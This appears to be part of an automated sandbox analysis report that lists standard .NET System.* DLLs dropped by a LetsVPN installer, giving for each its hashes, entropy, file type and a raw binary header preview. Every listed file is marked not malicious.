                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0..............)... ...@....... ....................................@.................................X)..O....@..$............... ....`...... (............................................... ............... ..H............text........ ...................... ..`.rsrc...$....@......................@..@.reloc.......`......................@..B.................)......H.......P ..P....................'......................................BSJB............v4.0.30319......l.......#~..X.......#Strings....,.......#US.0.......#GUID...@.......#Blob......................3......................................K.........]...........d.............o...".o...?.o.....o...}.o.....o.....o.....o.....h...-.o.................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.5...K.U...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.EventLog.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):34336
                                                                                                                                                                                                  Entropy (8bit):6.393304688632124
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:wVdeQes+wUTHP0G3cmL+7NQ1OaY74E2q3b2KZBZaS+ST6nkw:wXeQes+wUTHPbANP7t53qKA/mC
                                                                                                                                                                                                  MD5:302C378EA0267FBD51A039D4CD3D61E2
                                                                                                                                                                                                  SHA1:41A362A72EF0C135C00521F8564DF35F41650995
                                                                                                                                                                                                  SHA-256:62FC2DD05AB95436C22A43A74C3C2DEFE3E4650F44830F4DA1732BE206EB4239
                                                                                                                                                                                                  SHA-512:F929BBF9CEDEDCD6013876752ABF3E04EC8AF4E303910F7B25864036711DAE4227FE78B057CC640DD6DA336CF3EB41CAA188E698EE92B3BF96400F9495A39758
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....K............" ..0..N...........l... ........... ...............................O....`................................._l..O....................X.. ...........pk..T............................................ ............... ..H............text....L... ...N.................. ..`.rsrc................P..............@..@.reloc...............V..............@..B.................l......H.......<%...,...........Q.......j.......................................~....*..0..........(....,..*..(.....o.......&...*...................0...........(.......(....-..,..*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*..,&(....,..r...pr...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*...(....*.(....,.r...p......%...%...%...(....*....( ...*.(....,"r...p......%...%...%...%..

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.FileVersionInfo.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.958901473799381
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:x6oWJjWehqWOHlLf2KQcvBZ9NY07S+ShjmM6IGBkSoy0z:x6v/q3b2KZBZo07S+ST6nkTX
                                                                                                                                                                                                  MD5:3DA8C454B5F9E5F3B22603C2B681BD33
                                                                                                                                                                                                  SHA1:08DECEF175B8D1F178953999274847DBAF0D03D7
                                                                                                                                                                                                  SHA-256:B67ED6607475FC7F7A69AC0C62241062A52DC5F831F3433ED760F52F1083F993
                                                                                                                                                                                                  SHA-512:1AAB49A79CCC903E7486C0848023225FFF445F1A1F1B0EE31BC609D9F6F9266809A1F372388E68ECD54CF8EBB35A44E9E4E9419AA9B815346305780E5DA3DCE2
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0..............(... ...@....... ...............................y....@.................................H(..O....@..p............... ....`.......'............................................... ............... ..H............text........ ...................... ..`.rsrc...p....@......................@..@.reloc.......`......................@..B................|(......H.......P ..@....................&......................................BSJB............v4.0.30319......l...|...#~......(...#Strings............#US.........#GUID...$.......#Blob......................3......................................z...............\.....0...........D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.$...C.?...K._...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.PerformanceCounter.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):43040
                                                                                                                                                                                                  Entropy (8bit):6.064632964448439
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:FTyj5cKJfE+MJnnvnL0jxq3b2KZBZa89JtS+ST6nkeX:FTC5Ve0jE3qK7/mkX
                                                                                                                                                                                                  MD5:AF2D1149CA10620B40A349F6B67F82FD
                                                                                                                                                                                                  SHA1:39C24A88A8F6E26F4238DEE7D39266A30C9E315A
                                                                                                                                                                                                  SHA-256:E7402498B6412FABBD15287DE3792685617F2A1146014BE60AC40965652B2165
                                                                                                                                                                                                  SHA-512:5244D538995578C74CD656F79A65175AE60451DBCB3E0CB1F0F9E36A971A98AC31D8A5014871708F65C724A13CAF3814CA7ED7B5145F6F8EF38A37481CA9CC2A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....D..........." ..0..n.............. ........... ..............................?.....`.....................................O....................z.. ...............T............................................ ............... ..H............text....l... ...n.................. ..`.rsrc................p..............@..@.reloc...............x..............@..B........................H.......\&...5...........\...............................................~....*..0..........(....,..*..(.....o.......&...*...................0...........(.......(....-..,..*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*..,&(....,..r...pr...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*...(....*.(....,.r...p......%...%...%...(....*....(....*.(....,"r...p......%...%...%...%..

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.Process.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17440
                                                                                                                                                                                                  Entropy (8bit):6.889108022269452
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:pqk53/hW3fZ+zWt4hqWOHlLf2KQcvBZ91aiS+ShjmM6IGBkSgz:pqk53MJoq3b2KZBZnS+ST6nkX
                                                                                                                                                                                                  MD5:5E7BDFD79859F22E5D9F5DD5F026517E
                                                                                                                                                                                                  SHA1:A6618DC790291C2E4CF7C26C336EBCF33D619B88
                                                                                                                                                                                                  SHA-256:CA66E00B269BE8D63EF8CEA8BB04CB7E3D9AA9662B83ABF7FBEEC1D3CC912BA8
                                                                                                                                                                                                  SHA-512:F1EC165581CB09180C383F7F43FC1E084AE73CED9B2533016E444D04E4AA78A64233F8EAE3CF4708B8E53E5D422A2A4B12CDDA05517FC1E73ED5964E540953CA
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0.............**... ...@....... .............................._.....@..................................)..O....@..0............... ....`.......(............................................... ............... ..H............text...0.... ...................... ..`.rsrc...0....@......................@..@.reloc.......`......................@..B.................*......H.......P ...................... (......................................BSJB............v4.0.30319......l...$...#~..........#Strings............#US.........#GUID...........#Blob......................3............................................................j.q.........~.................}.....3.....L.................g.....P...................k.....k.....k...).k...1.k...9.k...A.k...I.k...Q.k...Y.k...a.k...i.k...q.k.......................#.....+.....3.....;.....C.7...K.W...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.StackTrace.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):19488
                                                                                                                                                                                                  Entropy (8bit):6.776949657141779
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:lFCc4Y4OJWfOWqWWOW1hqWOHlLf2KQcvBZ9o0S+ShjmM6IGBkSUA:nCcyCLq3b2KZBZ1S+ST6nk9A
                                                                                                                                                                                                  MD5:4CBEB58C5611362601BDC06540422F1D
                                                                                                                                                                                                  SHA1:D3CB8204EF113D8817DB547CE8EC36FD43CBCF5E
                                                                                                                                                                                                  SHA-256:F63B8FCF9EBE4C0344B5D95EE65ECF83850C8E55A2DD4280615EA0B8DEB92021
                                                                                                                                                                                                  SHA-512:3538E7F9B604D060A18E8556545F5FEC5F53D9348898556FAFF38126D3F10B7300A08650ED99323EED123449178C1E461E80D69CA5C2DE9806BDCA8E145FCB7C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Z.........." ..0.............N.... ...@....... ...............................O....@..................................-..O....@.................. ....`......L-............................................... ............... ..H............text...T.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................0.......H........ ..4....................,......................................F.(....~....(....*6.o.....(....*6.o..........**.o.......*.~....*.~....*.BSJB............v4.0.30319......l.......#~..<.......#Strings.... .......#US.(.......#GUID...8.......#Blob...........GU.........3..................................................8.........*.h...m.h.....Z.....$...........Z...+.|.....Z...1.Z.....$.....$.......3.D.......|...F.|...c.|.....|.....|.....|.....|.....|.....Z...I.|...}.Z.....Z.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.TextWriterTraceListener.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.9834026919899745
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:CAWxMWRhqWOHlLf2KQcvBZ9/UWS+ShjmM6IGBkSxK:CvFq3b2KZBZyWS+ST6nkuK
                                                                                                                                                                                                  MD5:A0CFB7229C44350D8B167F809BCC5C82
                                                                                                                                                                                                  SHA1:C7322697682880AE761D49FBD54523ECAB2DCDD4
                                                                                                                                                                                                  SHA-256:491D8D66F1C221AFC45A78C722E440D1954E21FB0C7DF124D172D0E8D4A1EAC7
                                                                                                                                                                                                  SHA-512:38D5B7AB41341237BB8C3014083443C934DF9952C883D46F26B9A52A8C84EE89DE128887B4EF833E217BE9A022DDE8AC2F4691EEBB02324B2D34059EA6695E23
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0..............(... ...@....... ...............................=....@..................................(..O....@.................. ....`......L'............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................(......H.......P ..|....................&......................................BSJB............v4.0.30319......l.......#~......P...#Strings....D.......#US.H.......#GUID...X...$...#Blob......................3......................................z...........!...\.!...0.....A.....D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.,...C.G...K.g...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.Tools.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.958092237087259
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:+AlcWHaWZhqWOHlLf2KQcvBZ9ooS+ShjmM6IGBkSse:P9zq3b2KZBZ9S+ST6nkne
                                                                                                                                                                                                  MD5:DF525B438444B76BCB156B66E7161E84
                                                                                                                                                                                                  SHA1:3DC313D7F3CC9CAF2E07B958BFDCD00DCB0DCF37
                                                                                                                                                                                                  SHA-256:3AD983B3F53F29734D1A7BFA34DF9D12890641AE701D7491380BA3F96160EC29
                                                                                                                                                                                                  SHA-512:96BF743CFA0A5E128213BF52B61F818ABD76AD48C9C23E042BF816BF2884F3203FB6678245CA21CE6D9B9B0D5648EDB239E7A5C19B87E1E84283B0738B751575
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0..............(... ...@....... ...................................@..................................(..O....@.. ............... ....`......d'............................................... ............... ..H............text........ ...................... ..`.rsrc... ....@......................@..@.reloc.......`......................@..B.................(......H.......P .......................&......................................BSJB............v4.0.30319......l.......#~......|...#Strings....p.......#US.t.......#GUID...........#Blob......................3............................................................`.....1.....t.................s.....).....B.................].........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.5...K.U...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.TraceSource.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17440
                                                                                                                                                                                                  Entropy (8bit):6.891837867115112
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:l8IZnWlNWxhqWOHlLf2KQcvBZ926lS+ShjmM6IGBkSQu:GUywq3b2KZBZXS+ST6nkTu
                                                                                                                                                                                                  MD5:849EF7F81E30B7588D0DE5E5D6BD8E40
                                                                                                                                                                                                  SHA1:F9D68F2AFEBCF43B9F70040CB312FEEC2C1DA8A6
                                                                                                                                                                                                  SHA-256:63B6ADB455FADEB5DCD50A54013EFB4FF38229FB7880876E808A682811B02C49
                                                                                                                                                                                                  SHA-512:D00A7E17D6CF293229CF93198D7C5607FBB47BA99A75AEBA1761057549F0B81E316B8B7E319FFBA9B421E2837261D79355947DFEACEC9FC1BE4C387FF714B7B3
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0.............2*... ...@....... ...................................@..................................)..O....@..P............... ....`.......(............................................... ............... ..H............text...8.... ...................... ..`.rsrc...P....@......................@..@.reloc.......`......................@..B.................*......H.......P ......................((......................................BSJB............v4.0.30319......l...\...#~..........#Strings............#US.........#GUID...........#Blob......................3............................................................t...................................=.....V.................q.....Z...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;. ...C.;...K.[...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.Tracing.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):27168
                                                                                                                                                                                                  Entropy (8bit):6.589374706387424
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:qQq33333333kX+TBi8Bq3b2KZBZUS+ST6nkz:tu1i803qKi/mZ
                                                                                                                                                                                                  MD5:BFC312F081410FB6DA38D96C81F1DBA0
                                                                                                                                                                                                  SHA1:AB97835A609001CE1A1A423E60C92F50DFB30E2F
                                                                                                                                                                                                  SHA-256:2164BC42B0909DF2674F4F301C24B865FDF3328D6DF4A11E34C29A2D13B16F51
                                                                                                                                                                                                  SHA-512:94D3FE930981A7E77BC116178F5328A1F666929FB9E6800C5AC8B2870CFCDD52E40AC92D260F1C5197065ADE6DFACE2FC5E9F591153AFC77642693AC4A491753
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Z.........." ..0.............RM... ...`....... ...............................I....@..................................L..O....`..x............<.. ...........PL............................................... ............... ..H............text...X-... ...................... ..`.rsrc...x....`.......0..............@..@.reloc...............:..............@..B................3M......H.......8*...!...................K.......................................0..H........(.....-.r...ps....z.-.r...ps....z.(......}......(#...}.....{.....o....*"..(....*....0..Z.............%.r#..p.%..{.....%.rA..p.%..{..........%.rS..p.%..{....l.{....l[...ra..p(.....(....*&...{....*.0..4.................}......+....{.....".......X.....{.....i2.*.0..k..........{........{..........."....(.......X....{.....i.0%.(..........(.....(.......,..(........"....3.....}....*.......=..M......

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Drawing.Common.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):55840
                                                                                                                                                                                                  Entropy (8bit):5.935591964243442
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:fJbgUxvrIn01EkO/69KzwmOiGeCcSP8UIre3qK6/mj:f1xvrInsEkO/AKzwm3C0UOe2/M
                                                                                                                                                                                                  MD5:321AA362C269B7998E487EABBA76DF89
                                                                                                                                                                                                  SHA1:59717CD20D72BD4067D988BD098667AD328CA25F
                                                                                                                                                                                                  SHA-256:AF6EFED5F99926E2948F49CDA00D6EF52FEE0BD6006A5FF292A8D165C6C5054A
                                                                                                                                                                                                  SHA-512:8F73EED30895D32724B6731C1031632F070C8E695CEEA4644EAD4F0CB9D546AF7CBA26EC806033A2BC4661160123D4F86EB8A7B21767A7C716E91E7192758799
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................" ..0.............n.... ........... ..............................kH....`.....................................O....................... ...........8...T............................................ ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................O.......H........)...\...............6...........................................~....*..0..........(....,..*..(.....o.......&...*...................0...........(.......(....-..,..*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*..,&(....,..r...pr...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*...(....*.(....,.r...p......%...%...%...(....*....(....*.(....,"r...p......%...%...%...%..

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Drawing.Primitives.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.9586207641045785
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:G28YFlXulWY/WJhqWOHlLf2KQcvBZ9mH6S+ShjmM6IGBkSB7IT:G0qCq3b2KZBZMaS+ST6nkhT
                                                                                                                                                                                                  MD5:2546F1626A6DA255A1BA53361C9BACAB
                                                                                                                                                                                                  SHA1:5F2BFC8C263EC4C16EECE35AF449BF796A38EC09
                                                                                                                                                                                                  SHA-256:4EF0AEE89AFE95C84FD39CD5E6B3C0615BEC80DD9F2A3E032431664054199B43
                                                                                                                                                                                                  SHA-512:D6F937F3617E365E697A42624D25608F151FE1838C01EBCDEDFAA98F3318939FB6AE61A954877FDCD18999E7F786E0C8875ACDA856E91B201D21E6C2FC101746
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0..............(... ...@....... ....................................@..................................(..O....@.. ............... ....`......t'............................................... ............... ..H............text........ ...................... ..`.rsrc... ....@......................@..@.reloc.......`......................@..B.................(......H.......P .......................&......................................BSJB............v4.0.30319......l.......#~..,...P...#Strings....|.......#US.........#GUID...........#Blob......................3......................................................~.....R..... .....f.................e...........4.....}...........O.....8...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.6...K.V...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Dynamic.Runtime.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17952
                                                                                                                                                                                                  Entropy (8bit):6.846896849834963
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:duMLcdQ5MW9MWWhqWOHlLf2KQcvBZ9Szk6hFWS+ShjmM6IGBkSb:8OcSp8q3b2KZBZV6SS+ST6nk4
                                                                                                                                                                                                  MD5:6D457DEF3C837293F37CA120532A14DB
                                                                                                                                                                                                  SHA1:8884226BCB76B3335EA1DDCC37C93304B9D43A2E
                                                                                                                                                                                                  SHA-256:DACB18FB653B44FFF1822A7048DECF50A45C009F86D5730646B168E06D8E3707
                                                                                                                                                                                                  SHA-512:1B43B755F1A9A374329E0BA9C7CAC46E1EA25768284E38A8D5094F0416FEBFE919C02D37AD4FBF2D21328A8592B159807931A683869BC519EEBE86D4E36A5C3C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0..............,... ...@....... ....................................@..................................+..O....@.................. ....`.......*............................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................,......H.......P .......................*......................................BSJB............v4.0.30319......l.......#~..p...0...#Strings............#US.........#GUID...........#Blob......................3................................................;.........................$.....$.....$.....$...[.$...t.$.....$.....$.........g.$.....#...........e.....e.....e...).e...1.e...9.e...A.e...I.e...Q.e...Y.e...a.e...i.e...q.e.......................#.....+.....3.....;.....C.3...K.S...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Globalization.Calendars.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17440
                                                                                                                                                                                                  Entropy (8bit):6.918920376522975
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:2eZ7RqXWDRqlRqj0RqFW1hqWOHlLf2KQcvBZ97dPFHhS+ShjmM6IGBkSI:X9qKqjqjuqMq3b2KZBZv3S+ST6nkH
                                                                                                                                                                                                  MD5:BA85D809EC7A22051C54AF57D0AD7C6E
                                                                                                                                                                                                  SHA1:3A6D7B63940F0BC004C119EE802B2ABC0EF6D131
                                                                                                                                                                                                  SHA-256:C22CEC6D7BB7133464E72DD27F86C863717FDBB20B03B7A6992F84C41C9B0664
                                                                                                                                                                                                  SHA-512:09229B959088298EE827D9C6A0360C843B1EEF9FA9BC197582DD13988A7EFC86AB00DE0EC74B3A1E659968094FB97D9F61B880C36C17AC097B106A9816AE4F0C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0..............*... ...@....... ...............................?....@.................................X*..O....@..P............... ....`...... )............................................... ............... ..H............text........ ...................... ..`.rsrc...P....@......................@..@.reloc.......`......................@..B.................*......H.......P ..P....................(......................................BSJB............v4.0.30319......l...L...#~......l...#Strings....$.......#US.(.......#GUID...8.......#Blob......................3......................................z...............\.....0.....%.....D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;. ...C.;...K.[...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Globalization.Extensions.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):21536
                                                                                                                                                                                                  Entropy (8bit):6.733022853099171
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:5NBMbljRC+lgfS1RPWYR1Rw0R9WYRPWYRDRj0R9W4hqWOHlLf2KQcvBZ91fS+ShO:5vMhF2SzNzwu/Nljuzq3b2KZBZnS+ST8
                                                                                                                                                                                                  MD5:374B265EEB90FDED2AB11EE7543E2A0B
                                                                                                                                                                                                  SHA1:EC1EE2B9AB15AC348ABF1930ECCD677C2026AC33
                                                                                                                                                                                                  SHA-256:551DC892D640C22AD5D4A31991E053C753D59DFED8E9BA492F360FB8487BE70B
                                                                                                                                                                                                  SHA-512:D206BB30BB66CA6CE206B540791EB1BEC94B47F1A9E19F610DF5F207690E2E3D252F98571C743A2A72DC7C49AA5A6A5D56FBEC051B2E6E88AA36698B530145B4
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Z.........." ..0..............6... ...@....... ....................................@.................................a6..O....@...............&.. ....`.......5............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`.......$..............@..B.................6......H........"..H............4......(5........................................o....*"..o....*..o....*"..o....*j~....%-.&(....s....%.....*..*.0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*2r...p.(....*......(....*...0..K........-.r1..ps....z. ...@3.(....*. ....3.(....*. ...._,.(....rI..ps..

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Globalization.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.9967929370197135
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:QZ4RLWdRfRJ0RZWJhqWOHlLf2KQcvBZ9k1S+ShjmM6IGBkSHVz:QZK0pJucq3b2KZBZMS+ST6nkkN
                                                                                                                                                                                                  MD5:B4DE713393E243E6B74ABA592A87BC70
                                                                                                                                                                                                  SHA1:D7B85D8EC0E3A2AE2AD7548E2AEFBC0FBEA0B3D3
                                                                                                                                                                                                  SHA-256:22B10C588D9D3BFD3F14551E26891880C3F10D30D9AE24907DF81155843619BF
                                                                                                                                                                                                  SHA-512:4968FD0B2DA1DC05D9B5ADB08E2DF79FDD232212BA59D0726FB1FE2C0A4E72E9DA83E2986A60E6CE20A05B4BFBB061A72F2E4DD4F6B6A6BB6AFDCED1845B4E53
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
